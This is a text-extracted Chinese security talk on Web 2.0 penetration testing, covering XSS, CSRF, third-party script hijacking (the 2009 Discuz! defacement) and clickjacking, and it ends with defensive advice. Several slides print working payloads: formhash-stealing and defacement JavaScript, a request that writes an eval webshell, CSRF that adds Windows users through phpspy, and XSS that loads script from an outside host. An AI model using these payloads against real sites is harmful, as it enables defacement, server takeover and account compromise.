web 20的滲透測試

1、WEB2.0下的滲透測試,5up3rh3i@gmail.com,WEB1.0下的滲透測試,通過web服務器漏洞直接溢出得到cmdshell iis60day.bin –t www.microsoft.com –p 80通過web應用程序傳統(tǒng)漏洞得到webshell 傳統(tǒng)漏洞是指作用于web服務端語言的漏洞如上傳、sql注射、包含等。 phpwind0day.php –t www.phpwind.com –

2、p 80主要特點 屬于服務端攻擊，攻擊效果“直截了當”，還是目前主流的滲透測試方式，但是尋找漏洞成本越來越高，安全產(chǎn)品的應用使利用越來越困難！,關于WEB 2.0,Web2.0一種相對概念,提倡的是高親和力的交互應用，主體是用戶之間用戶與網(wǎng)站之間的互動。Web2.0的核心注重的不僅是技術，而更注重的設計思想。 AJAX技術的誕生標著web進入2.0時代，也是其核心技術 web2.0更注重互動的

3、設計思想 如博客、wiki、sns網(wǎng)絡等誕生Web2.0下的滲透繼承了web2.0的特點：思想更重要！,WEB2.0下的滲透測試,攻擊的目標主要的攻擊方式：XSS、CSRF、第三方內(nèi)容劫持、Clickjacking等。攻擊方式的趨勢走向攻擊成功后的效果現(xiàn)有的認識幾個滲透小故事,攻擊的目標,與WEB1.0相比，WEB2.0滲透是針對客戶端的攻擊。包括網(wǎng)站用戶，網(wǎng)站的管理員，網(wǎng)站的運維、安全人員，還包括和你一樣的“滲透者”。

4、,主要的攻擊方式--XSS,XSS在web1.0誕生，在web2.0時代出名。 1996年就有人提到了這類攻擊。[Jeremiah Grossman說的] 1999年David Ross和Georgi Guninski提出“Script injection”。 2000年apache官方一篇文檔里正式取名“Cross Site Scripting”。 2005年samy worm

5、誕生，標志著XSS進入web2.0時代，xss火了?。?2007年出版的《XSS Attacks Book》提出：“XSS is the New Buffer Overflow, JavaScript Malware is the new shell code” XSS的利用： web1.0時代：彈筐[alert()]+收集cookie[document.cookie] web2.0時代

6、：xss worm 這也是目前xss的主流利用！我們思想還處于90年代！這也是廣大腳本小子被bs的原因之一！XSS =/= 彈筐+收集cookie+worm xss本質(zhì)是在于執(zhí)行腳本[javascript/html等]，而一個javascript就足夠讓你黑遍這個世界！,主要的攻擊方式--CSRF,CSRF---Cross Site Request Forgery 誕生于2000年，

7、火于2007/2008年。 得益于XSS的光芒，及幾大web2.0的應用 如gmail的CSRF漏洞。直譯為：“跨站請求偽造”?！翱纭笔撬暮诵摹?* 跨http site ** 攻防技術已經(jīng)趨于成熟如《Bypass Preventing CSRF》2008年 對于csrf的防御 ** CSRF worm 我在2008.01年blog提到過這個概念

8、,2008.09 80sec實現(xiàn) 《百度Hi Csrf蠕蟲攻擊》 * 跨協(xié)議通信《Inter-Protocol Communication》—by Wade Alcorn 2006年，讓通過客戶端攻擊用戶本地電腦其他服務變?yōu)榭赡?。如下代碼在webkit下實現(xiàn)了http與irc的通信：,gibson = document.createElement("form");gibson.setAttrib

9、ute("name","B");gibson.setAttribute("target","A");gibson.setAttribute("method","post");gibson.setAttribute("action","http://127.0.0.1:6677&quo

10、t;);gibson.setAttribute("enctype","multipart/from-data");crashoverride = document.createElement("textarea");crashoverride.setAttribute("name","C");postdata = "

11、USER A B C D \nNick xxxx\n";crashoverride.setAttribute("value",postdata);crashoverride.innerText = postdata;crashoverride.innerHTML = postdata;gibson.appendChild(crashoverride);document.body.appendCh

12、ild(gibson);gibson.submit();,主要的攻擊方式--CSRF,從其他應用程序發(fā)起的跨站請求如word winrar等文件。,主要的攻擊方式--第三方內(nèi)容劫持,《The Dangers of Third Party Content》---by SanJose OWASP-WASCAppSec2007 2009年開始天朝紅火了一把:《Dz事件》（在后面講具體提到）廣告業(yè)務、網(wǎng)頁游戲、統(tǒng)計服務導致

13、第三方內(nèi)容應用廣泛。web應用程序里的第三方內(nèi)容，比如bbs官方升級提示功能等其他應用程序里的第三方內(nèi)容，如瀏覽器插件里的引入的js html等。包括JavaScript, HTML, Flash, CSS, etc.,主要的攻擊方式--第三方內(nèi)容劫持,又一個個“引狼入室”的悲劇故事。劫持第三方內(nèi)容的方法： *域名劫持如百度事件：直接攻擊域名注冊商 *會話劫持：如arp會話劫持（zxarps.exe ）、交換機會話劫

14、持（SSClone） *直接攻取第三方內(nèi)容服務器權限。 “恩，很黃很暴力！”目前基本沒有安全防御意識。 “你的安全被別人做了主了!”,主要的攻擊方式-- Clickjacking,Clickjacking--點擊劫持 * by Jeremiah Grossman and Robert Hansen in 2008 ，立刻紅火！ * WEB 2.0安全進入“美工黑客”時代！ * 安全防御者的惡夢，

15、一個新的http header誕生：X-Frame-Options衍生出的其他UI劫持 如： Tapjacking “觸摸劫持” ?,攻擊方式的趨勢走向,,攻擊方式越來越“猥瑣”，沒有最“猥瑣”只有更“猥瑣”。新的攻擊方式從誕生到紅火時間越來越短。,攻擊成功后的效果,從上面的攻擊方式來看，它們有一個共同的目標：“劫持你的瀏覽器”。 “哪里有瀏覽器哪里就有攻擊！”“劫持你的瀏覽器”的效果就是你的“身份被劫

16、持”所以攻擊目標的“身份”決定了“滲透思想”,攻擊成功后的效果,劫取你的隱私?網(wǎng)站的普通用戶 如常見的取得你ID、密碼、cookie、聯(lián)系等劫取你的權限?網(wǎng)站管理人員 如網(wǎng)站的后臺，進一步通過后臺得到網(wǎng)站的權限等劫取你的系統(tǒng)?所有用戶 如利用瀏覽器的漏洞，或者通過跨協(xié)議利用你系統(tǒng)上其他服務的漏洞得到你的系統(tǒng)權限，或者取得本地系統(tǒng)上文件的讀寫能力等劫取你的“內(nèi)網(wǎng)” ?公司成員，這個又因在內(nèi)網(wǎng)的身

17、份不同而不同，如分開發(fā)測試員、運維人員、內(nèi)部網(wǎng)絡管理人員、安全測試人員等等。 如通過攻擊程序員的開發(fā)環(huán)境，直接取得內(nèi)網(wǎng)系統(tǒng)的權限,目前對于WEB2.0滲透測試的認識,Web2.0滲透==xss==彈筐+收集cookie+wormWeb2.0滲透==Mailxss?office等軟件0day釣魚Web2.0滲透==Xssshell、Beef、Anehta這些 xss攻擊平臺工具?？戳?/p>

18、下面的幾個故事，或許有所改變,幾個滲透小故事,【黑遍全世界】----談談“Dz事件”【螳螂捕蟬】----談談“滲透者自身的安全”【本地web開發(fā)測試環(huán)境的安全隱患】【來自“漏洞庫”的漏洞】【是誰想動了我的奶酪?】,【黑遍全世界】之 “Dz事件”,名詞解釋： “Dz事件” 是指2009年1月8日一大批的Discuz!論壇的首頁被篡改為“Hacked by ring04h, just for fun!”的事件。官

19、方通告：“本次安全問題系由域名劫持造成，Discuz! 各版本軟件代碼在安全上并無問題 ”事件的根本原因是“第三方內(nèi)容劫持”，這里“第三方內(nèi)容”具體是指“后臺升級提示系統(tǒng)”引入位于http://customer.discuz.net 上的javascript代碼 Discuz!_5.5.0_SC_GBK\upload\admin\global.func.php ： echo '';

20、從官方通告來看ring04h正是通過攻擊 http://customer.discuz.net 這個域名來達到劫持這個js的目的！,被劫持后的http://customer.discuz.net/news.php 代碼片段：// 獲取FORMHASHxmlhttp.open("GET", siteurl+"admincp.php?action=home&sid="+sid, fa

21、lse);xmlhttp.send(null);var datas = xmlhttp.responseText;var reg = / name=\"formhash\" value=\"([\w\d]+)\"/i;var arr = reg.exec(datas);var formhash = arr[1];// 調(diào)用XMLHTTP POST自定義數(shù)據(jù)xmlht

22、tp.open("POST", siteurl+"admincp.php?action=settings&edit=yes", false);xmlhttp.setRequestHeader("Referer", siteurl);xmlhttp.setRequestHeader("Content-Type","applicatio

23、n/x-www-form-urlencoded");xmlhttp.send(unescape("settingsnew%5Bseohead%5D=%3Cscript%3Efunction+init%28%29+%7B+document.write%28%27Hacked+by+ring04h%2C+just+for+fun%21%27%29%3B%7Dwindow.onload+%3D+init%3B%3C%2

24、Fscript%3E%0D%0A&settingsubmit=+%CC%E1%BD%BB+&formhash="+formhash));}通過后臺“seo 設置”為過濾html的漏洞，插入js：function init() { document.write('Hacked by ring04h, just for fun!');}window.onload = init; 來達到

25、篡改主頁的目的！,,,本次事件是“善意”的，“惡意”的攻擊還在后頭！！結合其他后臺得到webshell的漏洞，可以直接控制整個被攻擊的論壇主機,如： //通過SODB-2008-10寫入webshell//http://www.80vul.com/dzvul/sodb/10/sodb-2008-10.txtxmlhttp.open("POST", siteurl+"admincp.p

26、hp?action=runwizard&step=3", false);xmlhttp.setRequestHeader("Referer", siteurl);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xmlhttp.se

27、nd(unescape("settingsnew%5Bbbname%5D=%3C%3F@eval($_POST[cmd])%3A%3F%3E&settingsnew%5Bsitename%5D=Comsenz+Inc.&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=+%CF%C2%D2%BB%B2%BD+&

28、;formhash="+formhash)); 直接把寫入了forumdata/logs/runwizardlog.php文件里,在后續(xù)的“惡意”的攻擊,,跨應用程序的“第三方內(nèi)容劫持”攻擊，讓你“黑遍全世界”,目前discuz就升級提示功能已經(jīng)放棄了使用引入第三方js了，但是還有其他功能里有應用。目前大多數(shù)應用程序使用引入第三方js：如phpwind,【螳螂捕蟬】,,,,【黃雀在后】攻擊者“螳螂”把捕獲的“蟬

29、”的密碼通過img發(fā)送給steal.php收集保存某個文件里或者數(shù)據(jù)庫里，然后后臺顯示管理，這個后臺管理就是攻擊者“黃雀”的目標了：嘗試提交url：http://ha*****.com/steal.php?data=%3Cscript%20src%3Dhttp%3A%2F%2Fwww%2E80vul%2Ecom%2Fsobb%2Falert%2Ephp%3E%3C%2Fscript%3E,http://www.80vul.c

30、om/sobb/alert.php 的代碼：因為不是“惡意”攻擊，只是簡單的收集了一下ip及referer[后臺url]。,【本地web開發(fā)測試環(huán)境的安全隱患】,故事發(fā)生在2008年的一天，從一個圖片開始…..,Phpspy缺少csrf的防御，我們可以嘗試下直接利用phpspy本身的“執(zhí)行命令”功能來攻擊開發(fā)者(angel)的本地開發(fā)環(huán)境。聯(lián)系angel得到phpspy2008的代碼，得到了“執(zhí)行命令”功能的提交方式，當時構造

31、代碼如下： var url = 'http://localhost/phpspy/2008.php?action=shell&execfunc=system&command=net user heige heige /add|echo fuck >c:\\heige.txt'; getURL(url);function getURL(s) {    v

32、ar image = new Image();    image.style.width = 0;    image.style.height = 0;    image.src = s;} 找了個借口讓angel訪問了放置如上代碼的url……結果：因為沒有考慮ie的“隱私策略”導致cookie被攔截而失敗！但是這個思路是完全可行的

33、！,其他的一些思路： A:“Dz事件”的延續(xù) :,調(diào)用通過后臺得到的webshell： forumdata/logs/runwizardlog.php執(zhí)行系統(tǒng)命令，本地web服務器是apache的，一般都是用高權限運行….xmlhttp.open("POST", siteurl+"forumdata/logs/runwizardlog.php", false);xmlhttp.setR

34、equestHeader("Referer", siteurl);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");//執(zhí)行命令為net user 80vul 80vul /add 在實際hack中可以換為ftp tftp或者echo iget.vbs等方法下載并且執(zhí)行你

35、的程序xmlhttp.send("cmd=%6E%65%74%20%75%73%65%7,B:利用開發(fā)編輯器的漏洞。如：,C:利用系統(tǒng)其他服務的漏洞比如某ftp軟件的溢出漏洞等，使用“跨協(xié)議通信”或者相關的協(xié)議攻擊本地。如：Sun Solaris 10 ftpd存在一個繞過驗證執(zhí)行系統(tǒng)命令的漏洞，他可以通過ftp://直接在網(wǎng)頁里調(diào)用實現(xiàn)對本地的攻擊,一個挑戰(zhàn)：《HackGame No.1 》,【來自“漏洞庫”的漏洞

36、】,該故事發(fā)生在今年的5月由80vul發(fā)起的[SOBB]項目,在部分的漏洞公告里，我們預留了一個攻擊接口，目的是為了探測各大網(wǎng)絡媒體轉貼觸發(fā)的xss漏洞。不過一不小心直接跨進了某著名網(wǎng)絡安全公司的內(nèi)網(wǎng)的“漏洞庫”:后續(xù)的攻擊？,【是誰想動了我的奶酪?】,80vul建立以來，有沒有人想黑我們呢？于是我們布置了一個簡單的“網(wǎng)”：,Content-Type: text/htmlServer: Microsoft-IIS/7

37、.0X-Powered-By: PHP/5.2.12, Date: Sun, 28 Nov 2010 11:21:26 GMTContent-Length: 5993,【是誰想動了我的奶酪?】,用標簽加載img.php后，用onload事件加載javascript文件anti.php這樣設計的目的：只有img.php和anti.php兩個文件都加載時，才說明有“魚”進網(wǎng)。防止別人單一提交的嘗試。,新時代的防御,加強培

38、訓[一個永恒的主題,SDL的前提和精髓]本次探討的主題是“攻擊方式”，而不是“漏洞類型”，也就是說“攻擊方式”面向的不僅僅是程序開發(fā)員！,新時代的防御,保護好你本地和內(nèi)網(wǎng)開發(fā)測試環(huán)境及相關的web應用服務。 1.與公司內(nèi)部網(wǎng)絡隔離。 2.在開發(fā)測試的同時，不允許連接外網(wǎng)。 3.加強本地測試環(huán)境的安全設置，對開源的應用程序運行前進行大概的審查：如查找“http”對于開發(fā)應該加強對第三方內(nèi)容的審查和控制，特別是可以執(zhí)